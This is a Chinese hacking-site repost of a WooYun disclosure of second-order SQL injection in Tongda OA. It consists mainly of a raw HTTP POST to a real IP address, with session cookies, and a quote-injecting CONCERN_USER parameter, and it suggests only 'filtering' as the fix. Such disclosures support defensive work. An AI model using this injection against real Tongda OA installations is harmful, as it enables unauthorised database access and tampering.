记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

通达oa多处二次注射漏洞

2015-03-15 12:40

QQ图片20141215110029.jpg



添加关注的人,众多功能依赖该数据

code 区域
POST http://121.40.134.14/general/person_info/concern_user/update.php HTTP/1.1

Host: 121.40.134.14

Connection: keep-alive

Content-Length: 70

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://121.40.134.14

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://121.40.134.14/general/person_info/concern_user/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: UserSelectRole=0; PHPSESSID=3242388d3217ca04d2440224594bd5db; USER_NAME_COOKIE=wangde; OA_USER_ID=wangde; SID_5=f48e5e5e; hideTopbar=1



CONCERN_USER=user%28%29chenqiang%2C&CONCERN_USER_NAME=%CB%D5%C3%F72%2C





提交

code 区域
CONCERN_USER=user%28%29chenqiang%2C'%27wang'de%2C&CONCERN_USER_NAME=%CD%F5%B5%C2'%2C'



导致

QQ截图20141215111005.png



漏洞证明:

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-087199

阅读:97943 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“通达oa多处二次注射漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词